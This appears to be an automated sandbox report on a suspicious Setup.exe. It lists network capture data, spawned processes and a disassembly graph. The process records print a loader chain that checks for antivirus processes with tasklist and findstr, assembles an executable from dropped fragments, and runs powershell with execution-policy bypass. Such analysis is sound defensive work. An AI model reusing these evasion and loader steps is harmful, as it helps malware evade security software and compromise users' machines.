                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vwFdg4fgzq3zjggU7TCdcN%2BhanT5h9f%2FMI0NiQkIvLm%2FKI5zDYk5X4Y6kZdxLrj57n8WVjGPgcVFzWJ5XJLfT6qB0O7W%2B0MhuyL20q%2BT7asSbDUVc4zvtUhZ%2FmvZS53p"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f6c8140d9e27288-EWR
                                                                                                                                                                      2024-12-24 00:34:18 UTC815INData Raw: 31 31 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                      Data Ascii: 11d4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                      2024-12-24 00:34:18 UTC1369INData Raw: 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63
                                                                                                                                                                      Data Ascii: es/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('c
                                                                                                                                                                      2024-12-24 00:34:18 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22
                                                                                                                                                                      Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="
                                                                                                                                                                      2024-12-24 00:34:18 UTC1019INData Raw: 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22
                                                                                                                                                                      Data Ascii: reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"
                                                                                                                                                                      2024-12-24 00:34:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Statistics

                                                                                                                                                                      CPU Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Memory Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:19:33:22
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:73'409'696 bytes
                                                                                                                                                                      MD5 hash:588EEB3D8F305FC008F034E10E0015C0
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:1
                                                                                                                                                                      Start time:19:33:23
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd
                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:2
                                                                                                                                                                      Start time:19:33:23
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:3
                                                                                                                                                                      Start time:19:33:25
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:tasklist
                                                                                                                                                                      Imagebase:0x200000
                                                                                                                                                                      File size:79'360 bytes
                                                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:4
                                                                                                                                                                      Start time:19:33:25
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                      Imagebase:0x130000
                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:5
                                                                                                                                                                      Start time:19:33:25
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:tasklist
                                                                                                                                                                      Imagebase:0x200000
                                                                                                                                                                      File size:79'360 bytes
                                                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:6
                                                                                                                                                                      Start time:19:33:26
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                      Imagebase:0x130000
                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:7
                                                                                                                                                                      Start time:19:33:26
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:cmd /c md 280366
                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:8
                                                                                                                                                                      Start time:19:33:26
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:extrac32 /Y /E Agrees
                                                                                                                                                                      Imagebase:0xea0000
                                                                                                                                                                      File size:29'184 bytes
                                                                                                                                                                      MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:9
                                                                                                                                                                      Start time:19:33:26
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:findstr /V "Travels" Served
                                                                                                                                                                      Imagebase:0x130000
                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:10
                                                                                                                                                                      Start time:19:33:27
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems I
                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:11
                                                                                                                                                                      Start time:19:33:27
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:Hc.com I
                                                                                                                                                                      Imagebase:0x260000
                                                                                                                                                                      File size:947'288 bytes
                                                                                                                                                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:12
                                                                                                                                                                      Start time:19:33:27
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:choice /d y /t 5
                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                      File size:28'160 bytes
                                                                                                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:16
                                                                                                                                                                      Start time:19:34:16
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:powershell -exec bypass error code: 523
                                                                                                                                                                      Imagebase:0xc20000
                                                                                                                                                                      File size:433'152 bytes
                                                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:17
                                                                                                                                                                      Start time:19:34:16
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:18
                                                                                                                                                                      Start time:19:34:18
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="RskevRB4u02FLFVl.7vQxYmyVWENwhkb2yKr86BmjBM-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8f6c8140d9e27288</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div><!-- /.error-footer --> </div><!-- /#cf-error-details --> </div><!-- /#cf-wrapper --> <script> window._cf_translation = {}; </script> </body> </html>
                                                                                                                                                                      Imagebase:0xc20000
                                                                                                                                                                      File size:433'152 bytes
                                                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:19
                                                                                                                                                                      Start time:19:34:18
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Reset < >

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:17.5%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:21%
                                                                                                                                                                        Total number of Nodes:1482
                                                                                                                                                                        Total number of Limit Nodes:25
                                                                                                                                                                        execution_graph 4175 402fc0 4176 401446 18 API calls 4175->4176 4177 402fc7 4176->4177 4178 401a13 4177->4178 4179 403017 4177->4179 4180 40300a 4177->4180 4182 406831 18 API calls 4179->4182 4181 401446 18 API calls 4180->4181 4181->4178 4182->4178 4183 4023c1 4184 40145c 18 API calls 4183->4184 4185 4023c8 4184->4185 4188 407296 4185->4188 4191 406efe CreateFileW 4188->4191 4192 406f30 4191->4192 4193 406f4a ReadFile 4191->4193 4194 4062cf 11 API calls 4192->4194 4195 4023d6 4193->4195 4198 406fb0 4193->4198 4194->4195 4196 406fc7 ReadFile lstrcpynA lstrcmpA 4196->4198 4199 40700e SetFilePointer ReadFile 4196->4199 4197 40720f CloseHandle 4197->4195 4198->4195 4198->4196 4198->4197 4200 407009 4198->4200 4199->4197 4201 4070d4 ReadFile 4199->4201 4200->4197 4202 407164 4201->4202 4202->4200 4202->4201 4203 40718b SetFilePointer GlobalAlloc ReadFile 4202->4203 4204 4071eb lstrcpynW GlobalFree 4203->4204 4205 4071cf 4203->4205 4204->4197 4205->4204 4205->4205 4206 401cc3 4207 40145c 18 API calls 4206->4207 4208 401cca lstrlenW 4207->4208 4209 4030dc 4208->4209 4210 4030e3 4209->4210 4212 405f7d wsprintfW 4209->4212 4212->4210 4213 401c46 4214 40145c 18 API calls 4213->4214 4215 401c4c 4214->4215 4216 4062cf 11 API calls 4215->4216 4217 401c59 4216->4217 4218 406cc7 81 API calls 4217->4218 4219 401c64 4218->4219 4220 403049 4221 401446 18 API calls 4220->4221 4222 403050 4221->4222 4223 406831 18 API calls 4222->4223 4224 401a13 4222->4224 4223->4224 4225 40204a 4226 401446 18 API calls 4225->4226 4227 402051 IsWindow 4226->4227 4228 4018d3 4227->4228 4229 40324c 4230 403277 4229->4230 4231 40325e SetTimer 4229->4231 4232 4032cc 4230->4232 4233 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4230->4233 4231->4230 4233->4232 4234 4022cc 4235 40145c 18 API calls 4234->4235 4236 4022d3 4235->4236 4237 406301 2 API calls 4236->4237 4238 4022d9 4237->4238 4240 4022e8 4238->4240 4243 405f7d wsprintfW 4238->4243 4241 4030e3 4240->4241 4244 405f7d wsprintfW 4240->4244 4243->4240 4244->4241 4245 4030cf 4246 40145c 18 API calls 4245->4246 4247 4030d6 4246->4247 4249 4030dc 4247->4249 4252 4063d8 GlobalAlloc lstrlenW 4247->4252 4250 4030e3 4249->4250 4279 405f7d wsprintfW 4249->4279 4253 406460 4252->4253 4254 40640e 4252->4254 4253->4249 4255 40643b GetVersionExW 4254->4255 4280 406057 CharUpperW 4254->4280 4255->4253 4256 40646a 4255->4256 4257 406490 LoadLibraryA 4256->4257 4258 406479 4256->4258 4257->4253 4261 4064ae GetProcAddress GetProcAddress GetProcAddress 4257->4261 4258->4253 4260 4065b1 GlobalFree 4258->4260 4262 4065c7 LoadLibraryA 4260->4262 4263 406709 FreeLibrary 4260->4263 4264 406621 4261->4264 4268 4064d6 4261->4268 4262->4253 4266 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4262->4266 4263->4253 4265 40667d FreeLibrary 4264->4265 4267 406656 4264->4267 4265->4267 4266->4264 4271 406716 4267->4271 4276 4066b1 lstrcmpW 4267->4276 4277 4066e2 CloseHandle 4267->4277 4278 406700 CloseHandle 4267->4278 4268->4264 4269 406516 4268->4269 4270 4064fa FreeLibrary GlobalFree 4268->4270 4269->4260 4272 406528 lstrcpyW OpenProcess 4269->4272 4274 40657b CloseHandle CharUpperW lstrcmpW 4269->4274 4270->4253 4273 40671b CloseHandle FreeLibrary 4271->4273 4272->4269 4272->4274 4275 406730 CloseHandle 4273->4275 4274->4264 4274->4269 4275->4273 4276->4267 4276->4275 4277->4267 4278->4263 4279->4250 4280->4254 4281 4044d1 4282 40450b 4281->4282 4283 40453e 4281->4283 4349 405cb0 GetDlgItemTextW 4282->4349 4284 40454b GetDlgItem GetAsyncKeyState 4283->4284 4288 4045dd 4283->4288 4286 40456a GetDlgItem 4284->4286 4299 404588 4284->4299 4291 403d6b 19 API calls 4286->4291 4287 4046c9 4347 40485f 4287->4347 4351 405cb0 GetDlgItemTextW 4287->4351 4288->4287 4296 406831 18 API calls 4288->4296 4288->4347 4289 404516 4290 406064 5 API calls 4289->4290 4292 40451c 4290->4292 4294 40457d ShowWindow 4291->4294 4295 403ea0 5 API calls 4292->4295 4294->4299 4300 404521 GetDlgItem 4295->4300 4301 40465b SHBrowseForFolderW 4296->4301 4297 4046f5 4302 4067aa 18 API calls 4297->4302 4298 403df6 8 API calls 4303 404873 4298->4303 4304 4045a5 SetWindowTextW 4299->4304 4308 405d85 4 API calls 4299->4308 4305 40452f IsDlgButtonChecked 4300->4305 4300->4347 4301->4287 4307 404673 CoTaskMemFree 4301->4307 4312 4046fb 4302->4312 4306 403d6b 19 API calls 4304->4306 4305->4283 4310 4045c3 4306->4310 4311 40674e 3 API calls 4307->4311 4309 40459b 4308->4309 4309->4304 4316 40674e 3 API calls 4309->4316 4313 403d6b 19 API calls 4310->4313 4314 404680 4311->4314 4352 406035 lstrcpynW 4312->4352 4317 4045ce 4313->4317 4318 4046b7 SetDlgItemTextW 4314->4318 4323 406831 18 API calls 4314->4323 4316->4304 4350 403dc4 SendMessageW 4317->4350 4318->4287 4319 404712 4321 406328 3 API calls 4319->4321 4330 40471a 4321->4330 4322 4045d6 4324 406328 3 API calls 4322->4324 4325 40469f lstrcmpiW 4323->4325 4324->4288 4325->4318 4328 4046b0 lstrcatW 4325->4328 4326 40475c 4353 406035 lstrcpynW 4326->4353 4328->4318 4329 404765 4331 405d85 4 API calls 4329->4331 4330->4326 4334 40677d 2 API calls 4330->4334 4336 4047b1 4330->4336 4332 40476b GetDiskFreeSpaceW 4331->4332 4335 40478f MulDiv 4332->4335 4332->4336 4334->4330 4335->4336 4337 40480e 4336->4337 4354 4043d9 4336->4354 4338 404831 4337->4338 4340 40141d 80 API calls 4337->4340 4362 403db1 KiUserCallbackDispatcher 4338->4362 4340->4338 4341 4047ff 4343 404810 SetDlgItemTextW 4341->4343 4344 404804 4341->4344 4343->4337 4346 4043d9 21 API calls 4344->4346 4345 40484d 4345->4347 4363 403d8d 4345->4363 4346->4337 4347->4298 4349->4289 4350->4322 